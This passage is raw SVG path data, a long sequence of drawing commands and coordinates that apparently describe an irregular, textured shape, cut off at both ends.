.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5.6,0-2.69-.4,4.8-.3.9-.5.1.3-4.69-.1-4.4-.2,3.6.1,2.5-.3,2.31-.6,4.4.2,4-.1,8.4.1-5.1-1.2,5.4-1.7,3.09-2.8,2,0,7.4.3,7,0-4.3-.3-5.8-.7-3.59-1a21.48,21.48,0,0,1,3,.3c2.91-.4-1.4-2.1,8.6-1.3-4.5-.5-8-1.6.2-1.3-1.3-.4-6.5-.2-7.3-.4,11.4-.8,2.1-2.3,8.8-3.2,6.2,1,4.4.1,5.3-.1-1.7-.3-2.3-.6-3.6-.9,0-.1-.4-.2-1.8-.4-.3-.1-.7-.1-1.1-.2.2,0,.4.1.6.1-.4,0-.7-.1-1.2-.1a31.52,31.52,0,0,1,4-.2l1.2.3a1.25,1.25,0,0,1-.6-.1c0,.3.1.6,2.4,1-.19-.2-.1-.2.1-.3a3.88,3.88,0,0,1,1.6,1,4.91,4.91,0,0,1-.5-.1c.2,0,.3.1.5.1a.79.79,0,0,1,.2.7h0c0,.1-.1.3-.1.4a5.54,5.54,0,0,0-1-.2c-3.2-.2.1.8-2.5.8a24.16,24.16,0,0,1,4.3.9c-3.1-.5-4-.2-1.8.4-2.1-.1-3.4-.7-5.2-.8,2.8.5,2.5,1.1,3.5,1.2,0-.1.2-.2,2,.1,2.1.5-.7.2.3.7,3.91.7,1.6-.2,3.91.1-.81.5,3.19.6,3.19.6,4.1,1-1.4.4-3.9,0,4.1.6,7.5,1.6,8.3,1.3-4.4-.9,1.7-.1-2.5-1.2a21.08,21.08,0,0,0,4.1.5c-2.2-.6-4.4-.5-5.4-1.1,1.4-.7,10.6,1.5,9.7,2.1,2.1.1,1.4,0,.7-.5,3.6,1,2.4.2,4,.3,1.3.4,1.1.6,1.3.9a5.08,5.08,0,0,1-.8.3,3.07,3.07,0,0,0-1-.2c.5.3.3.4,0,.5-.5.1-1.1.3-1.7.4,1.3.7,1.6,1.4,1.7,2-.2,0-.4-.1-.6-.1,1.5-.3-1.3,0-5.2-.9.3.2-.2.4,1.3.7.1-.7,2.5,1,4.2.8-2-.4-1.1-.4.4-.3a1.52,1.52,0,0,0,.1.6c-1.2,0-2.8-.1-3.1.2,1.5.3,2.6.5,3.3.7a3,3,0,0,0,.4.7h-1.09a10.53,10.53,0,0,0,1.4.3,5,5,0,0,0,1.1.7c-.7,0-2.91-.4-3.1-.3,4,.8-.1.4,3.4,1.1a19.63,19.63,0,0,0-2-.2,13.53,13.53,0,0,0-2.3-.7c-.91,0-1.1,0-.91.1-3.8.7,8.1,2.3-3.09,2.4a5.23,5.23,0,0,0-1.31-.1c-2.1-.4-1.69-.7-4.69-1.2a11.09,11.09,0,0,0,3.5,1.2c-.1-.2,1.8.2,2,.1a4,4,0,0,1-.5-.1c6.4.4,2,.5.5.9,3.9.2,6,.5,1.9.6,9.5.6,1.8-.5,3.19-1.1a9,9,0,0,0,3.1,0c.2.1.5.2.9.4.7-.1,4,1,5.5,1.4,1.1-.4-6.5-2.1-.69-1.6a12.16,12.16,0,0,0,4.3.9c-1.3-.4-2.8-.8-4.4-1.2-.9-.6,1.5-.4,2.69-.4-1.59-.3-3.8-.6-4.3-.8h.4c1.31.3,2.81.6,4.7,1,.8,1.5,4.6,3.6,1.8,5.2,10.7-.4-2.6-2.5,7-3.1,1.9.1,4.1.2,6.1.2.5.2.3.3,3.1.6-2.1-.1.4.5,1.3.9,1.5-.4,1.6-1,1.5-1.6a87.43,87.43,0,0,1,12.3-.9c-2.4-1.2,3.31-2.2,10.5-2.8-.8.3-1.8.5-.2,1-.09-.1.31-.2,1,.1.31.4-5.19-.7-5-.3,2.5.5,4.31.3,5.2.8-3.5-.3.1.2,1.3.7-2.19-.2-1.69.3-3.9-.1,7.5,2.1-1.3,1.5.2,2.5-3.9-.6-3.8-.2-4.9,0,3.9.7,1.7-.3,5,.3-1.4.8,3.8,3.1,7,4.6-2.8-.4-2.2-.6-4.3-.9-.6.3,4.1.9,4.5,1.3-4.3-.2-10.3-.5-3.3,1.2.1-.2-.6-.5.8-.3.1.3,5.7,2.1.8,1.7a39.85,39.85,0,0,1-4.4-1.1c1.4.2,1.8.1,1.9-.1-3.3-.5-2.9-.8-5.4-1.2-1.3.2,3,.7,2.4,1-2.9-.5-2.2-.6-4.2-.7,2.4.6,3.1,1.4,5.6,1.6-4.5-.5,2.4,1.6-2.4,1.2-2.7-.5,2.5-.2-2.4-.9-.6.1-.4.5.5,1,4.6.9-1-.4,2,.1,4.6.7,3.8,1.7,6.7,1.9-4.4-1.4.2-1.5-4-2.3,2.8.2,3.2-.2,6.9.3,0,.4.5.4,1.6,1.3-3.1-.4-10.1-.8-1.6.6-1-.6.7-.4,2.9-.1-2.3,0,3.5,1.1.4,1,4.6.7.8-.8-.6-1.2,1.3.2,1.5.4,3.2.6-2.5-1.8.9-2.1,4.6-2.7-5.4-.9-3.1.2-8-.6a8,8,0,0,0-1.2-.4c3.3.5,3.4.2,2.8-.3,3.6.6,4.4.5,6.1.7-7.1-1.7-3-2-1.1-2.3a20.39,20.39,0,0,1,2.2.6c1.2-.5.7-1-2.7-1.7,2.2.4-2.7-1.1.6-.7.7.2,3.4,1,4.2.8-3.2-.7-3.4-1.3-3.8-1.8a25,25,0,0,0,5.1.5c-1.8-.6-4.8-.6-6.4-1.2,4.1.4.3-.9,5.6-.4q-4.05-.6-3.3-.9c1.2.2,7,1.4,4.2.7-3.8-.5-3-1.3-.4-.8-.3.8,6.2,1.4,7.9,2.4a16.72,16.72,0,0,0-2-.2c-2.1-.3-1.5-.6-4.3-.9-.3.5-2.9,0,.4,1a25.83,25.83,0,0,1-5.1-.6c-.2.4,5.2,1.1,5.5,1.5s-1.6.1-.7.5c-1.1-.2-2.1-.4-3.1-.5,2.3,1-.2.2,3.5,1.4-1.2.2-4.2-.2-7.1-.6.8.4,5.8.9,6.4,1.3,0,.6,2.2,1.3-.4,1.3-1.7-.3-.7-.4-2.3-.7.1.2.2.3.2.5,3.4.6,3.1.3,5.3.9-3.4-1.8,2.9-1.7-1.6-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.